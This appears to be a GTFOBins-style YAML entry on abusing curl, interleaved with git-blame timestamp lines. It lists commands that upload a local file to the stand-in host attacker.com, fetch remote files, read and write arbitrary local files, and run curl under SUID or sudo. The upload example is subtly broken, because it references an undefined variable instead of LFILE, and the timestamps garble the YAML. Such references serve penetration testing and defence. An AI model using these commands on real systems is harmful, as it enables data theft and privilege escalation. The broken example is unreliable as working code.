2018-05-21 21:14:41 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
file-upload:
2018-09-25 19:51:20 +02:00
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
2018-07-16 15:01:50 +02:00
code: |
URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
2018-10-05 19:55:38 +02:00
file-download:
2018-07-16 15:01:50 +02:00
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE
2018-06-10 10:49:59 +02:00
file-read:
2018-07-16 15:01:50 +02:00
- description: The file path must be absolute.
code: |
LFILE=/tmp/file_to_read
curl file://$LFILE
2021-04-11 12:10:42 +02:00
file-write:
- description: The file path must be absolute.
code: |
LFILE=file_to_write
TF=$(mktemp)
echo DATA >$TF
curl "file://$TF" -o "$LFILE"
2018-10-05 19:55:38 +02:00
suid:
2018-07-22 15:30:03 +02:00
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
./curl $URL -o $LFILE
2018-10-05 19:55:38 +02:00
sudo:
2018-07-22 15:30:03 +02:00
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
2020-06-10 22:53:45 +02:00
sudo curl $URL -o $LFILE
2018-05-25 01:10:39 +02:00
---